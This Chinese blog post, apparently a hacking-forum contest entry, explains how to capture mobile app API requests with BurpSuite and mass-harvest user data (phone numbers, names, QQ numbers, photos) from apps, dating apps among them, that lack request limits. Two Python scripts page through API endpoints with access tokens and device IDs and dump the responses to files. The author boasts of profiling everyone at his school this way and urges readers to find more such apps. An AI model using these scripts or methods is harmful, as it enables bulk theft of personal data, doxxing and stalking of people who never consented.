AZ0NE

关于我

网络安全爱好者

参加法克论坛征文比赛的文章,如果能有奖品就么么哒了,哈哈哈!

#.1说是脱裤,但是又不算脱裤,就是对某些手机软件的对用户的查询吧,由于某些APP对于客服端的请求没有限制,而APP设计者为了方便写程序的功能直接把用户一些极其隐私的信息(手机号码,姓名,qq等)直接反馈给查询者,查询者就可以编写脚本重复查询批量JUMP APP的用户信息,批量得到这些信息后可以做什么呢?好多APP软件用户都会上自己的真实头像(特别是婚恋网站),有了这些信息可以自己把信息到入到数据库里用PHP写个网恋社工库,直接把头像姓名QQ号码啥一起显示出来(我承认我好无聊,曾经我就是这样把学校的人都搞了,用PHP写了个情报系统)。

#.2来实战吧

这里我用BurpSuite抓包演示,我们可以通过手机连上路由器,保证手机和电脑在局域网内,在手机WIFI连接那里选择高级->使用代理服务器,端口要与BurpSuite上设置的端口相同


PSOT方式的请求与利用脚本:


 



好多请求在浏览器里无法很好的操作,于是自己写了python利用脚本(写的不好,莫笑)

import urllib

import urllib2

mynum = 70

pagenum = 1

province = 2

while mynum > pagenum:

    url = 'http://xxxx.com/api_v5.7/mclient.php'

    values = {'access_token':'7cdf342d9164d52b252a1a95b5e9l8h8','a':'usersearch',

                             'uid':'18210997','type':'5'

                             ,'p':'lastvisit','page':pagenum

                             ,'keyword':'','gender':'2'

                             ,'avatar':'1','minheight':'0'

                             ,'maxheight':'0','minage':'18'

                             ,'maxage':'20','province':province

                             ,'city':'0','education':'0'

                             ,'deviceid':'860806027682677','lat':'45.707417'

                             ,'lon':'126.62931','appversion':'5.7.5.2','channel':'aiba'}

 

    data = urllib.urlencode(values)

    req = urllib2.Request(url, data)

    response = urllib2.urlopen(req)

    the_page = response.read()

    f = open('%s.txt' %province, 'a')

    f.write(the_page)

    f.close()

    pagenum = pagenum + 1


这样就可以自己翻页查询,具体的东西根据自己的需要再改


GET方式的请求与利用脚本:



python利用脚本

import urllib

import urllib2

 

url = "http://xxxx.com/api/event/city.json?access_token=6916a7ab1f71e43ac4eadf40a51b4ab168D23750D7FDC3A09AB79CC34905&basicCheck=0&city=0&type=2&time=0&age=0&occupation=0&alcohol=0&smoking=0&start=0&size=10000000"

 

req = urllib2.Request(url)

print req

 

res_data = urllib2.urlopen(req)

res = res_data.read()

f = open('user_data2.txt', 'a')

f.write(res)

f.close()

 

可能你会觉得没有必要用脚本,当数据大到几十万的时候浏览器就无力了,所以还是python大法好。

 

#3总结

好多APP都有类似的通病,轻易的将用户的手机号码什么的就泄露了,更多的自己去发掘

 




 

评论(1)
热度(8)
  1. Sevck's BlogAZ0NE 转载了此文字
© AZ0NE | Powered by LOFTER